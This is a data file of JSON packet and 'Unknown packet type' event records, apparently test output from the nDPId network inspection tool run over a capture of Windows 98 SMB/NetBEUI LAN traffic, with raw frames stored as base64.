00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":185,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409905958} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":185,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409905958}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":186,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AFBWM3ieAAwp1HmyABLw8D4uDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AFBWM3ieAAwp1HmyABLw8D4uDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":186,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409906045} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":186,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409906045}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":188,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409906065,"pkt":"AAwp1HmyAFBWM3ieAATw8QFALAAAAIARrUHAqO+BwKjv\/wCKAIoAxYA7EQIAHMCo74EAigCvAAAgRU5F"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":188,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409906065,"pkt":"AAwp1HmyAFBWM3ieAATw8QFALAAAAIARrUHAqO+BwKjv\/wCKAIoAxYA7EQIAHMCo74EAigCvAAAgRU5F"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":188,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409906373} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":188,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409906373}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":194,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAD7w8EAuDgD\/7xYEAAAAABcAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAADhAgEBAAcABEhlbGxvAA=="} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":194,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAD7w8EAuDgD\/7xYEAAAAABcAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAADhAgEBAAcABEhlbGxvAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":194,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409908865} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":194,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409908865}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":195,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFCAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":195,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFCAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":195,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409908865} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":195,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409908865}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":196,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAD7w8C5CDgD\/7xYMAAAXACgAAxX\/U01CKwAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAADhAgEBAAcABEhlbGxvAA=="} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":196,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAD7w8C5CDgD\/7xYMAAAXACgAAxX\/U01CKwAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAADhAgEBAAcABEhlbGxvAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":196,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409908865} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":196,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409908865}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":197,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8EIwDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":197,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8EIwDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":197,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409908973} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":197,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409908973}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":198,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFELwAAAIARq7fAqO+BwKjvAgCJAIkATO+bACIpAAABAAAAAAABIEZIRVBG"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":198,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFELwAAAIARq7fAqO+BwKjvAgCJAIkATO+bACIpAAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":198,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409908973} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":198,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409908973}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":199,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieABLw8DBEDgD\/7x8AAAAAAAAAAxVLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieABLw8DBEDgD\/7x8AAAAAAAAAAxVLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":199,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409909161} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":199,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409909161}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":200,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAATw8QEyDgD\/7xYEAAAAABYAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":200,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAATw8QEyDgD\/7xYEAAAAABYAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":200,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409909358} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":200,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409909358}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":201,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyADXw8EQyDgD\/7xYEAAAAABgAFQP\/U01CcQAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAAABAwAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":201,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyADXw8EQyDgD\/7xYEAAAAABgAFQP\/U01CcQAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAAABAwAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":201,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409911828} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":201,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409911828}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":202,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieADXw8DJGDgD\/7xYMAAAYACgAAxX\/U01CcQAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAAABAwAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":202,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieADXw8DJGDgD\/7xYMAAAYACgAAxX\/U01CcQAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAAABAwAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":202,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409911828} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":202,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409911828}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":203,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAATw8QE0DgD\/7xYEAAAAABcAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAy"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":203,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAATw8QE0DgD\/7xYEAAAAABcAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAy"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":203,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409911828} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":203,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409911828}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":204,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8EY0DgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":204,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8EY0DgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":204,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409911828} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":204,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409911828}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":205,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8Eg1DgD\/7xgAAAAAAAAAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":205,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyABLw8Eg1DgD\/7xgAAAAAAAAAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":205,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409911828} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":205,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409911828}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":206,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFLMAAAAIARqrfAqO+BwKjvAgCJAIkATO+bACIpAAABAAAAAAABIEZIRVBG"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":206,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAATw8QFLMAAAAIARqrfAqO+BwKjvAgCJAIkATO+bACIpAAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":206,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409911829} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":206,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409911829}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":207,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAAPw8FMyDgD\/7xYEAAAAABgAFQP\/U01CcQAAAAAAAAAAAAAAAAAAAAAAAAAAyAAy"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":207,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AFBWM3ieAAwp1HmyAAPw8FMyDgD\/7xYEAAAAABgAFQP\/U01CcQAAAAAAAAAAAAAAAAAAAAAAAAAAyAAy"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":207,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409911829} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":207,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409911829}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":208,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAAPw8XMwIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":208,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AAwp1HmyAFBWM3ieAAPw8XMwIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":208,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409911829} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":208,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":3,"global_ts_msec":1576409911829}
00548{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":172,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AwAAAAABAFBWM3ieAKzw8AMsAP\/vCAAAAAAAAAABAl9fTVNCUk9XU0VfXwIBTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAJwAAAAAAAAAAAAAAAAAAAAAAAAAnAFYAAwABAAEAAgA4AFxNQUlMU0xPVFxCUk9XU0UADADA1AEAV09SS0dST1VQAAAAAAAAAAQAACBAgAAAAABNREpSOTgA"} 00534{"packet_event_id":1,"packet_event_name":"packet","packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":172,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":1576409908392,"pkt":"AwAAAAABAFBWM3ieAKzw8AMsAP\/vCAAAAAAAAAABAl9fTVNCUk9XU0VfXwIBTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAJwAAAAAAAAAAAAAAAAAAAAAAAAAnAFYAAwABAAEAAgA4AFxNQUlMU0xPVFxCUk9XU0UADADA1AEAV09SS0dST1VQAAAAAAAAAAQAACBAgAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":172,"global_ts_msec":1576409912777} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":209,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":172,"global_ts_msec":1576409912777}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAdTUFSVElOIFJPU0VOQVUgAw=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAdTUFSVElOIFJPU0VOQVUgAw=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409925058} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":212,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409925058}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAeTUFSVElOIFJPU0VOQVUgAw=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAeTUFSVElOIFJPU0VOQVUgAw=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409925661} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409925661}
